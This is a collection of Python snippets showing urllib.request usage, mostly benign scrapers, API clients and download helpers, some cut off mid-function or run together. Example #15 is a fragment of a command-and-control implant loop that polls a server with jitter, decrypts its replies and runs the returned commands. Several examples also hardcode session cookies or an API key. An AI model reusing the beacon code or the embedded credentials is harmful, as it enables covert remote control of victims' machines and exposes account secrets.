Example #1
from flask import Flask, render_template
from urllib import request, parse
import json
import time

base_url = 'https://api.forismatic.com/api/1.0/'
parameters = [('method', 'getQuote'), ('format', 'json'), ('lang', 'en')]
request_url = base_url + '?' + parse.urlencode(parameters)
request_format = request.Request(request_url)
request_format.add_header('User-Agent', 'quotedaily')

# create the application object
app = Flask(__name__)


# use decorators to link the function to a url
@app.route('/')
def home():
    if time.localtime().tm_hour == 15:
        new_quote()
    quote = get_quote()
    return render_template('index.html', quote=quote[0])


def new_quote():
    url = request.urlopen(request_format).read()
    data = json.loads(url)
    with open('quote.json', 'w') as f:
        json.dump(data, f)
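
The snippet stops before get_quote() and the application entry point are defined. A minimal stand-in, assuming the quote is simply read back from the quote.json file written by new_quote() (field names follow the forismatic JSON format), might look like this:

def get_quote():
    # hypothetical helper: load the quote cached by new_quote()
    with open('quote.json') as f:
        data = json.load(f)
    return [data.get('quoteText', ''), data.get('quoteAuthor', '')]


if __name__ == '__main__':
    app.run(debug=True)
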

Example #2
def url_save_chunked(url,
                     filepath,
                     bar,
                     refer=None,
                     is_part=False,
                     faker=False):
    if os.path.exists(filepath):
        if not force:
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(os.path.getsize(filepath))
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'

        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if faker:
        headers = fake_headers
    else:
        headers = {}
    if received:
        headers['Range'] = 'bytes=' + str(received) + '-'
    if refer:
        headers['Referer'] = refer

    response = request.urlopen(request.Request(url, headers=headers), None)

    with open(temp_filepath, open_mode) as output:
        while True:
            buffer = response.read(1024 * 256)
            if not buffer:
                break
            output.write(buffer)
            received += len(buffer)
            if bar:
                bar.update_received(len(buffer))

    assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (
        received, os.path.getsize(temp_filepath), temp_filepath)

    if os.access(filepath, os.W_OK):
        os.remove(
            filepath
        )  # on Windows rename could fail if destination filepath exists
    os.rename(temp_filepath, filepath)
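
url_save_chunked (and url_save in Example #25) relies on module-level names that are not shown in this excerpt: force, fake_headers and tr. Rough stand-ins for experimenting with the snippet, stated here purely as assumptions about the originals, could be:

import os
from urllib import request

force = False  # assumed flag: overwrite existing files when True
fake_headers = {
    # assumed browser-like headers used when faker=True
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
}


def tr(s):
    # assumed no-op stand-in; the original helper prepares text for terminal output
    return s
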
Example #3
from urllib import request, parse

values = "username:'******'123456"
data = values.encode(encoding="gb2312")
url = 'https://music.163.com/#/song?id=869785'
my_request = request.Request(url, data)
response = request.urlopen(my_request)
print(response.read())
while 1:
    JiCi += 1
    YouBiao.execute("select URL from URL_Ji1 where ID=" + str(JiCi))
    url = YouBiao.fetchone()
    if url != None:
        url = url[0]
    else:
        break
    try:
        # extract the link
        if re.search(r"DirectLink.direct", url) != None:
            pmbh = re.findall(r"sp=S?(\w+)&", url)[1]
            url2 = "http://www.hngp.gov.cn/wsscnew/egp/jy/xyghjy/xyghxm/xyghzy/xzsp/XyspList.html?pmbh=" + pmbh + "&cgsl=0&cgje=0.0&ppbh=null&lastcgsl=0&lastcgje=0.0&xmxh=null&xyghbh=null&isnwwbz=ww&area=00390019&czy=null&lbbs=null"
            url2 = quote(url2, '\/:?=;@&+$,%.#\n')
            Request2 = request.Request(url=url2, headers=header1)
            try:
                DaKai_url2 = request.urlopen(Request2)
            except:
                try:
                    DaKai_url2 = request.urlopen(Request2)
                except:
                    print("打开链接" + url + "超时!略过此链接!")
                    RiZhiChuLi(2, url, pmbh, url2, None)
                    continue
            BeautifulSoup2 = BeautifulSoup(DaKai_url2,
                                           "html.parser",
                                           from_encoding="utf-8")
            # process the listing page
            YeShu = BeautifulSoup2.find("span", style="float:right").get_text()
            YeShu = re.findall(r"共(\d+)页", YeShu)[0]
Example #5
File: eyes.py Project: xpwi/py
    # 1. Japan
    # proxy = {'http': '140.227.65.196:3128'}
    # 2. Russia
    proxy = {'http': '94.242.59.135:1448'}

    # 2. Create a ProxyHandler
    proxy_handler = request.ProxyHandler(proxy)
    # 3. Create an Opener
    opener = request.build_opener(proxy_handler)
    # 4. Install the Opener
    request.install_opener(opener)

    # From here on, requests to the url go through the proxy server
    # To switch the browser user agent, see: https://www.cnblogs.com/xpwi/p/9600719.html
    try:
        req = request.Request(url)
        req.add_header(
            "User-Agent",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163"
        )

        rsp = request.urlopen(req)

        html = rsp.read().decode()
        print("访问成功访客+1,以下是该网页的HTML:\n", html, "\n访问成功访客+1,以上是该网页的HTML\n")

    except error.HTTPError as e:
        print(e)

    except Exception as e:
        print(e)
Example #6
###################################################
print('============= GET =============')

with request.urlopen('https://www.baidu.com') as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('  %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
#  Add headers
###################################################
print('============= Add headers =============')

req = request.Request('http://www.baidu.com')
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)
with request.urlopen(req) as f:
    data = f.read()
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('  %s: %s' % (k, v))
    print('Data: ', data.decode('utf-8'))

###################################################
#  Post
###################################################
print('============= POST =============')
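
The POST part of this example is cut off at this point. A minimal sketch of how such a request could look with urllib, using a placeholder endpoint and form fields rather than the original code:

from urllib import request, parse

login_data = parse.urlencode({'username': 'user', 'password': 'secret'}).encode('utf-8')
post_req = request.Request('https://httpbin.org/post', data=login_data)
with request.urlopen(post_req) as f:
    print('Status:', f.status, f.reason)
    print('Data: ', f.read().decode('utf-8'))
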
Example #7
agent3 = "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-CN; MHA-AL00 Build/HUAWEIMHA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.1.4.994 Mobile Safari/537.36"
agent4 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
agent5 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
list1 = [agent1, agent2, agent3, agent4, agent5]

agent = random.choice(list1)

# build the request headers
header = {
    "User-Agent":
    agent,
    "Cookie":
    "__guid=54589117.3355346342630053000.1545469390794.6116; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1545469392; _ga=GA1.2.525028080.1545469392; customerId=5c1dfddd1c648b470dce01bc; customerToken=7094f880-05c8-11e9-b37a-bbc022d7aefd; customerMail=; isLogin=yes; __utmz=54589117.1550903385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=54589117.525028080.1545469392.1550986423.1551265116.3; _gid=GA1.2.1073060500.1552831283; aliyungf_tc=AQAAAD/RilUP4wcAn/Q5cZh/y5cvhjrW; connect.sid=s%3AdBSjH13Adl1RlFsC2zZlAxGDmFh2kF_F.Yf52AS5i06bgo8lsniQWt1F4NtgmI3rOrmjBIiLwR6Q; SERVER_ID=5aa5eb5e-f0eda04d; Hm_lvt_5667c6d502e51ebd8bd9e9be6790fb5d=1551698067,1551698230,1552831282,1552908428; monitor_count=29; Hm_lpvt_5667c6d502e51ebd8bd9e9be6790fb5d=1552909773"
}

titlelist = []
jianjielist = []
ulist = []

for i in urllist:
    req = request.Request(i, headers=header)
    reponse1 = request.urlopen(req).read().decode()
    data1 = re.findall(
        r'"topicTotalNum":\d+,"title":"(.{0,50}?)","columnType":\d+,"authorId":',
        reponse1)
    #data2=re.findall(r'"columnList":.*?"_id":"(.*?)"',reponse1)
    data3 = re.findall(
        r'"columnTopics":.*?([(0-9)(a-z)(A-Z)]{24}).*?,"status"', reponse1)

    print(data3)
Example #8
def intormation_book(request, pagesize=24, pageno=1):
    try:
        try:
            if bool(request.GET['bool']) == True:
                pageno = int(request.GET['next_number'])
                pageno += int(request.GET['next'])
        except:
            pass
        try:
            if bool(request.GET['bool-back']) == True:
                pageno = int(request.GET['back_number'])
                pageno -= int(request.GET['back-up'])
        except:
            pass
        try:
            if pageno > int(request.GET['page_total']):
                pageno = int(request.GET['page_total'])
        except:
            pass

        informa_book_url = f'https://m.ebookservice.tw/api/3.00/ks/BookList/?pageSize=24&pageNo={pageno}&classification=TCL144&keyword='
        requests = req.Request(
            informa_book_url,
            headers={
                'cookie':
                'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
            })
        with req.urlopen(requests) as response:
            data = response.read().decode('utf8')

        data = json.loads(data)
        page_total = data['TotalRecordCount']
        datas = data['List']

        book_ID_dic = {}
        for date in datas:
            book_flash = {}
            book_ID = date['TinyBook']['BookId']
            book_contents = hot_book_total_url(book_ID)
            book_contents = read_hotbook_total_url(book_contents)

            book_flash.setdefault('book_img_url', hot_book_img(book_ID))  # cover image URL
            book_flash.setdefault('TitleCache',
                                  book_contents['TitleCache'])  # title
            book_flash.setdefault('Author', book_contents['Author'])  # author
            book_flash.setdefault('PublisherName',
                                  book_contents['PublisherName'])  # publisher
            book_flash.setdefault('TotalPage',
                                  book_contents['TotalPage'])  # total pages
            book_flash.setdefault('UpdateDate',
                                  book_contents['UpdateDate'])  # upload date
            book_flash.setdefault('Description',
                                  book_contents['Description'])  # description
            book_flash.setdefault('ISBN', book_contents['ISBN'])  # ISBN

            book_ID_dic.setdefault(book_ID, book_flash)
        return render(request, 'information-book.html', {
            'book_ID_dic': book_ID_dic,
            'pageno': pageno,
            'page_total': page_total
        })
    except:
        return render(request, 'information-book.html', {'date_time': "錯誤"})
Example #9
def hot_book(request,
             date_time=time.strftime(f'%Y/%m/%d', time.localtime()),
             book_number=1):
    try:
        try:
            book_number = request.GET['book_searcg']
        except:
            pass
        if time.strptime(date_time, f"%Y/%m/%d"):
            hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate={date_time}&endDate={date_time}%2023:59:59&type=book&takeSize={book_number}'
            # hot_book_url = f'https://m.ebookservice.tw/api/3.00/kl;taipei;nt;ty;ml;ntc;cy;cyc;tn;ks;pt;ph;il;km;hc;hcc;ylc;ntl2;tt;tcl/TclPopularBook/?beginDate=2020/11/5&endDate=2020/11/5%2023:59:59&type=book&takeSize={book_number}'
            requests = req.Request(
                hot_book_url,
                headers={
                    'cookie':
                    'mid=WLsL4gAEAAGl0Wjoc8Dv6CH_iYnP; mcd=3; ds_user_id=1926542376; csrftoken=9aasLCq0vb2dUQWY9j1rjP11aejod1wS; sessionid=1926542376%3AG5zq9okSZhBxWx%3A8; ig_did=8675D711-4D34-4DBA-8751-F9E4E3B8FA63; shbid=17721; shbts=1602880097.7694821; rur=VLL; urlgen="{\"61.228.154.31\": 3462}:1kTWVn:7qfV2Cxf3rs1oZ9BUi45bNQ18T4',
                    'User-Agent':
                    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
                })
            with req.urlopen(requests) as response:
                data = response.read().decode('utf8')

            datas = json.loads(data)
            datas = datas['List']
            book_ID_dic = {}
            # book_url_list= []

            for date in datas:
                book_flash = {}
                book_ID = date['TinyBook']['BookId']
                book_contents = hot_book_total_url(book_ID)
                book_contents = read_hotbook_total_url(book_contents)

                book_flash.setdefault('book_img_url',
                                      hot_book_img(book_ID))  # cover image URL
                book_flash.setdefault('TitleCache',
                                      book_contents['TitleCache'])  # title
                book_flash.setdefault('Author', book_contents['Author'])  # author
                book_flash.setdefault('PublisherName',
                                      book_contents['PublisherName'])  # publisher
                book_flash.setdefault('TotalPage',
                                      book_contents['TotalPage'])  # total pages
                book_flash.setdefault('UpdateDate',
                                      book_contents['UpdateDate'])  # upload date
                book_flash.setdefault('Description',
                                      book_contents['Description'])  # description
                book_flash.setdefault('ISBN', book_contents['ISBN'])  # ISBN

                book_ID_dic.setdefault(
                    book_ID, book_flash
                )  # {ID: [img_url, title, author, publisher, total pages, upload date, description, ISBN]}
                # book_url_list.append(hot_book_img(book_ID))   'book_url_list': book_url_list  # GET the image URL

            return render(
                request, 'hot-book.html', {
                    'date_time': date_time,
                    'book_number': book_number,
                    'book_ID_dic': book_ID_dic
                })
    except:
        return render(request, 'hot-book.html', {'date_time': "錯誤"})
        headers = {
            "accept-encoding":
            "gzip, deflate",  # auto delete br encoding. cos requests and scrapy can not decode it.
            "accept-language":
            "zh-CN,zh;q=0.9",
            "accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "user-agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
        }
        return url, headers

    method = 'GET'
    url, headers = mk_url_headers()
    body = None
    r = request.Request(url, method=method)
    for k, v in headers.items():
        if k.lower() == 'accept-encoding':
            continue  # urllib does not decompress the response automatically, so skip this header field
        r.add_header(k, v)
    s = request.urlopen(r)
    print(url)

    content = s.read()
    parser = Vparser()
    print('start')
    v = VHTML(content.decode())
    for i in v.xpath('//a/@href'):
        print(i)
    print('---- split ----')
    for i in v.xpath('//div/div/span[1][@class="wetSource"]/text()'):
Example #11
def loadpage(fullurl, filename):
    print("正在下载:", filename)
    req = request.Request(fullurl, headers=header)
    resp = request.urlopen(req).read()
    return resp
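
loadpage depends on a header dict defined elsewhere in the original script. A hedged usage sketch, with an assumed header and file handling:

from urllib import request

header = {'User-Agent': 'Mozilla/5.0'}  # assumed; the original header dict is not shown

html = loadpage('http://www.baidu.com', 'baidu.html')
with open('baidu.html', 'wb') as f:
    f.write(html)
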
Example #12
 def fetch(self, url, method='GET', headers=None, body=None):
     """Perform a HTTP request and return decoded JSON data"""
     headers = headers or {}
     if self.userAgent:
         if type(self.userAgent) is str:
             headers.update({'User-Agent': self.userAgent})
         elif (type(self.userAgent) is dict) and ('User-Agent'
                                                  in self.userAgent):
             headers.update(self.userAgent)
     if len(self.proxy):
         headers.update({'Origin': '*'})
     headers.update({'Accept-Encoding': 'gzip, deflate'})
     url = self.proxy + url
     if self.verbose:
         print(url, method, url, "\nRequest:", headers, body)
     if body:
         body = body.encode()
     request = _urllib.Request(url, body, headers)
     request.get_method = lambda: method
     response = None
     text = None
     try:  # send request and load response
         handler = _urllib.HTTPHandler if url.startswith(
             'http://') else _urllib.HTTPSHandler
         opener = _urllib.build_opener(handler)
         response = opener.open(request, timeout=int(self.timeout / 1000))
         text = response.read()
     except socket.timeout as e:
         raise RequestTimeout(' '.join(
             [self.id, method, url, 'request timeout']))
     except ssl.SSLError as e:
         self.raise_error(ExchangeNotAvailable, url, method, e)
     except _urllib.HTTPError as e:
         error = None
         details = text if text else None
         if e.code == 429:
             error = DDoSProtection
         elif e.code in [404, 409, 500, 501, 502, 521, 522, 525]:
             details = e.read().decode('utf-8', 'ignore') if e else None
             error = ExchangeNotAvailable
         elif e.code in [400, 403, 405, 503]:
             # special case to detect ddos protection
             reason = e.read().decode('utf-8', 'ignore')
             ddos_protection = re.search('(cloudflare|incapsula)',
                                         reason,
                                         flags=re.IGNORECASE)
             if ddos_protection:
                 error = DDoSProtection
             else:
                 error = ExchangeNotAvailable
                 details = '(possible reasons: ' + ', '.join([
                     'invalid API keys',
                     'bad or old nonce',
                     'exchange is down or offline',
                     'on maintenance',
                     'DDoS protection',
                     'rate-limiting',
                     reason,
                 ]) + ')'
         elif e.code in [408, 504]:
             error = RequestTimeout
         elif e.code in [401, 422, 511]:
             error = AuthenticationError
         self.raise_error(error, url, method, e, details)
     except _urllib.URLError as e:
         self.raise_error(ExchangeNotAvailable, url, method, e)
     encoding = response.info().get('Content-Encoding')
     if encoding in ('gzip', 'x-gzip', 'deflate'):
         if encoding == 'deflate':
             text = zlib.decompress(text, -zlib.MAX_WBITS)
         else:
             data = gzip.GzipFile('', 'rb', 9, io.BytesIO(text))
             text = data.read()
     body = text.decode('utf-8')
     if self.verbose:
         print(method, url, "\nResponse:", headers, body)
     return self.handle_response(url, method, headers, body)
Example #13
File: rest.py Project: openmsa/NO
    def __execute(self, http_method, url, basic_auth,
                        query_params, post_params):

        passwords = []

        if len(url) == 0:
            raise SystemError('url required')

        if len(query_params) > 0:
            url += '?' + parse.urlencode(query_params)

        if post_params == None:
            request_body = ''
        else:
            request_body = json.dumps(post_params)

        request_body = request_body.encode(self.char_code)

        http_header = {
            'Content-Type': self.CONTENT_TYPE,
            'Content-Length': str(len(request_body))
        }

        if len(basic_auth) > 0:
            passwords.append(basic_auth['pass'])
            authorization = basic_auth['id'] + ':' + basic_auth['pass']
            http_header['Authorization'] = 'Basic ' + base64.b64encode(
                        authorization.encode(self.char_code)).decode('ascii')

        # Output Log(MSA Request)
        log_msg = '[MSA Request]'
        log_msg += '[METHOD]' + http_method
        log_msg += '[URL]' + url
        log_msg += '[HEADER]' + json.dumps(http_header)
        log_msg += '[PARAMS]' + json.dumps(post_params)
        self.logger.log_info(__name__, log_msg, passwords)

        req = request.Request(url, headers=http_header, data=request_body)
        req.method = http_method

        with request.urlopen(req) as res:
            response_params = res.read().decode(self.char_code)

        # Output Log(MSA Response)
        log_msg = '[MSA Response]'
        log_msg += '[STATUS]' + str(res.getcode())
        log_msg += '[HEADER]' + str(res.headers)
        log_msg += '[PARAMS]' + response_params
        self.logger.log_info(__name__, log_msg, passwords)

        if len(response_params) > 0:

            try:
                response_params = json.loads(response_params)

            except json.decoder.JSONDecodeError:
                raise SystemError(response_params)

            except:
                raise

        return response_params
Example #14
    def saveResult(self, run, task):
        taskKey = task['key']
        log_file = run['logFile']
        headers = {'Accept':'text/plain'}

        fileNames = []
        for file in task['files']:
            fileNames.append(file['name'])

        try:
            util.write_file(json.dumps(task), log_file+'.stdOut')
        except:
            logging.debug('Could not save task '+taskKey)

        statisticsProcessed = False
        if APPENGINE_SETTINGS['statisticsFileName'] in fileNames:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['statisticsFileName']
                request = urllib2.Request(uri, headers=headers)
                response = urllib2.urlopen(request).read().decode()
                util.write_file(response, log_file)
                statisticsProcessed = True
            except:
                statisticsProcessed = False
                logging.exception('Could not save statistics of'+taskKey)
        else:
            statisticsProcessed = True


        if APPENGINE_SETTINGS['errorFileName'] in fileNames:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey+'/files/' + APPENGINE_SETTINGS['errorFileName']
                request = urllib2.Request(uri, headers=headers)
                response = urllib2.urlopen(request).read().decode()
                response = 'Task Key: {}\n{}'.format(task['key'], response)
                util.write_file(response, log_file+'.stdErr')
            except:
                logging.exception('Error while retrieving result file for '+taskKey)

        headers = {'Content-type':'application/json', 'Accept':'application/json'}
        markedAsProcessed = False
        if statisticsProcessed:
            try:
                uri = self.benchmark.config.appengineURI+'/tasksets/'+self.tasksetKey+'/tasks'
                request = urllib2.Request(uri, json.dumps([taskKey]).encode(), headers=headers)
                request.get_method = lambda: 'PUT'
                urllib2.urlopen(request)
                self.finishedTasks += 1
                markedAsProcessed = True
                logging.info('Stored result of task {0} in file {1}'.format(taskKey, log_file))
                try:
                    with open(self.benchmark.output_base_name+'.Processed_Tasks.txt', 'a') as f:
                        f.write(taskKey+'\n')
                except: pass
                logging.debug('Task {} finished. Status: {}'.format(taskKey, task['status']))
            except:
                logging.debug('The task {} could not be marked as processed.'.format(taskKey))

        if self.benchmark.config.appengineDeleteWhenDone and markedAsProcessed:
            try:
                uri = self.benchmark.config.appengineURI+'/tasks/'+taskKey
                request = urllib2.Request(uri, headers=headers)
                request.get_method = lambda: 'DELETE'
                urllib2.urlopen(request).read()
            except:
                logging.exception('The task {} could not be deleted.'.format(taskKey))
Example #15
  infile = StringIO.StringIO(data[16:])
  with gzip.GzipFile(fileobj=infile, mode="r") as f:
    data = f.read()
  return data

while(True):
  cstr=time.strftime("%%Y-%%m-%%d",time.gmtime());cstr=time.strptime(cstr,"%%Y-%%m-%%d")
  if cstr < kd:
    key = "%s"
    uri = "%s"
    server = "%%s/%%s%%s" %% (serverclean[0], random.choice(urls), uri)
    try:
      this_timer = random.randint(timer * (1 - jitter), timer * (1 + jitter))
      time.sleep(this_timer)
      ua='%s'
      if hh[0]: req=urllib2.Request(server,headers={'Host':hh[0],'User-agent':ua})
      else: req=urllib2.Request(server,headers={'User-agent':ua})
      res=urllib2.urlopen(req)
      html = res.read().decode("utf-8")
    except Exception as e:
      print("error %%s" %% e)
    if html:
      try:
        returncmd = decrypt(key, html)
        returncmd = returncmd.rstrip('\\0')
        returncmd = base64.b64decode(returncmd).decode("utf-8")
        if "multicmd" in returncmd:
          returncmd = returncmd.replace("multicmd","")
          returnval = ""
          splits = returncmd.split("!d-3dion@LD!-d")
Example #16
from urllib import request, parse
req = request.Request('http://www.baidu.com')  # add request headers to mimic a regular browser
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.9.3.1000 Chrome/39.0.2146.0 Safari/537.36')
resp = request.urlopen(req)
print(resp)
print(help(request.urlopen))

print('________________________________________________________________________________')
Example #17
    """
    turns an int into a human-readable byte size without the need of an external module
    found here: http://code.activestate.com/recipes/577081-humanized-representation-of-a-number-of-bytes/
    """
    suffixes = ['B', 'KB', 'MB', 'GB', 'TB']
    suffixIndex = 0
    while size > 1024:
        suffixIndex += 1  #increment the index of the suffix
        size = size / 1024.0  #apply the division
    return '{0:.{1}f} {2}'.format(size, precision, suffixes[suffixIndex])


print('Connecting to ebi public FTP server...')
## get ml_file_extensions via http
study_url = 'http://ftp.ebi.ac.uk/pub/databases/metabolights/study_file_extensions/ml_file_extension.json'
req = rq.Request(study_url)
con = rq.urlopen(req)

## get studies containing mzML
e = json.JSONDecoder()
study = e.decode(con.read().decode('utf-8'))
mzml_studies = [k['id'] for k in study if '.mzML' in k['extensions']]

## create output folder
if not os.path.isdir('example_files/metabolights'):
    os.mkdir('example_files/metabolights')
os.chdir('example_files/metabolights')

## start ftp session
ftp = ftplib.FTP('ftp.ebi.ac.uk')
ftp.login()
Example #18
from urllib import request

req = request.Request('http://www.douban.com')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('%s: %s' % (k, v))
    print('Data:', f.read().decode('utf-8'))
Example #19
import urllib.request as req
import matplotlib.pyplot as plt


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
    return url  # without this return the function would silently discard the built URL


url = "https://histock.tw/stock/financial.aspx?no=2887&t=2"

# attach headers to pose as a regular browser user
request = req.Request(
    url,
    headers={
        "user-agent":
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
    })

with req.urlopen(request) as response:
    data = response.read().decode("utf-8")
# print(data)
# parse the HTML source
import bs4
root = bs4.BeautifulSoup(data, "html.parser")

EPS_5Y = []


def inputstock(url):
    url = "https://histock.tw/stock/financial.aspx?no=" + url + "&t=2"
Example #20
def mesaj_gonder(isim, mesaj):
    data = json.dumps({"message":mesaj, "sender":isim}).encode()
    rq = request.Request(url, data, headers={'content-type': 'application/json'})
    response = request.urlopen(rq)
    return json.loads(response.read().decode())
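
mesaj_gonder ("send message" in Turkish) expects a module-level url pointing at a JSON chat endpoint. A hedged usage sketch with a placeholder endpoint:

import json
from urllib import request

url = 'http://example.com/api/messages'  # placeholder endpoint, not from the original

reply = mesaj_gonder('Ali', 'Merhaba!')  # POSTs {"message": ..., "sender": ...} as JSON
print(reply)
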
Example #21
#!/usr/bin/env python
# coding:utf-8

from urllib import request

with request.urlopen('http://news-at.zhihu.com/api/4/news/latest') as f:
    # Zhihu Daily newest feed API
    data = f.read()
    print('Status:', f.status, f.reason)
    print()
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', data.decode('utf-8'))

print("################################################################")

req = request.Request('http://daily.zhihu.com/')
# Zhihu Daily frontpage
req.add_header(
    'User-Agent',
    'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25'
)
# add header; request for iPhone version page
with request.urlopen(req) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('{0}: {1}'.format(k, v))
    print("################################################################")
    print('Data:', f.read().decode('utf-8'))
def GetScenes():
    req = urllib2.Request('http://localhost:8080/json.htm?type=scenes')
    resp = urllib2.urlopen(req)
    data = resp.read()
    data = json.loads(data)
    return data
Example #23
from urllib import request
url = "http://www.baidu.com"
# add header info to get around anti-scraping measures
header = {
    "User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
}
req = request.Request(url,headers=header)
res = request.urlopen(req)
html = res.read()
html = str(html, encoding='utf-8')
print(html)
Example #24
def index(request, lang="EN"):
    #template = loader.get_template('cv_parser/index.html')
    language = "Français"
    language_code = "fr"
    languages = {'language': 'English', 'code': 'us', 'link': 'EN'}
    if lang == "FR":
        with open("cv_parser/fr.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    elif lang == "EN":
        language = "English"
        languages = {'language': 'Français', 'code': 'fr', 'link': 'FR'}
        language_code = "us"
        with open("cv_parser/en.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    else:
        with open("cv_parser/fr.json", 'r') as config:
            json_config = json.loads(config.read())
            config.close()
    #with open("cv_parser/cache.json","r") as cache_file:
    #	json_cache=json.loads(cache_file.read())
    #	cache_file.close()
    #hash_of_adress = json_config["contact"]["adress"].encode("utf-8")
    #hash_of_adress = hashlib.md5(hash_of_adress).hexdigest()

    #if json_cache["adress"] != hash_of_adress:
    try:
        cmap = CenterMap(address=json_config["contact"]["adress"],
                         zoom=15,
                         key="AIzaSyCKM9tkv_Rc9fMhuwLhwNwvW8C9Y6hNuNg=")
        requ = req.Request(cmap.generate_url())
        pic = req.urlopen(requ)

        filePath = 'cv_parser/static/cv_parser/images/static_map.png'
        with open(filePath, 'wb') as localFile:
            localFile.write(pic.read())
            #json_cache["adress"] = hash_of_adress
            #with open("cv_parser/cache.json","w") as cache_file:
            #	json.dump(json_cache, cache_file)
            #	cache_file.close()
    except:
        print(
            "Error getting map image , put it manually in cv_parser/static/cv_parser/images/static_map.png"
        )

    #hash_of_config = json.dumps(json_config, sort_keys = True).encode("utf-8")
    #hash_of_config = hashlib.md5(hash_of_config).hexdigest()
    #logger.info(json_cache[lang.lower()+"_pdf_hash"])
    #logger.info(hash_of_config)
    #if json_cache[lang.lower()+"_pdf_hash"] != hash_of_config:
    template.create_template(json_config)
    #logger.info("new json")
    #json_cache[lang.lower()+"_pdf_hash"] = hash_of_config
    #with open("cv_parser/cache.json","w") as cache_file:
    #	json.dump(json_cache, cache_file)
    #	cache_file.close()

    # urllib.urlretrieve(self.url, filePath)

    return render(
        request, 'cv_parser/index.html', {
            'config': json_config,
            'language': language,
            'language_code': language_code,
            'languages': languages
        })
Example #25
def url_save(url, filepath, bar, refer=None, is_part=False, faker=False):
    file_size = url_size(url, faker=faker)

    if os.path.exists(filepath):
        if not force and file_size == os.path.getsize(filepath):
            if not is_part:
                if bar:
                    bar.done()
                print('Skipping %s: file already exists' %
                      tr(os.path.basename(filepath)))
            else:
                if bar:
                    bar.update_received(file_size)
            return
        else:
            if not is_part:
                if bar:
                    bar.done()
                print('Overwriting %s' % tr(os.path.basename(filepath)), '...')
    elif not os.path.exists(os.path.dirname(filepath)):
        os.mkdir(os.path.dirname(filepath))

    temp_filepath = filepath + '.download'
    received = 0
    if not force:
        open_mode = 'ab'

        if os.path.exists(temp_filepath):
            received += os.path.getsize(temp_filepath)
            if bar:
                bar.update_received(os.path.getsize(temp_filepath))
    else:
        open_mode = 'wb'

    if received < file_size:
        if faker:
            headers = fake_headers
        else:
            headers = {}
        if received:
            headers['Range'] = 'bytes=' + str(received) + '-'
        if refer:
            headers['Referer'] = refer

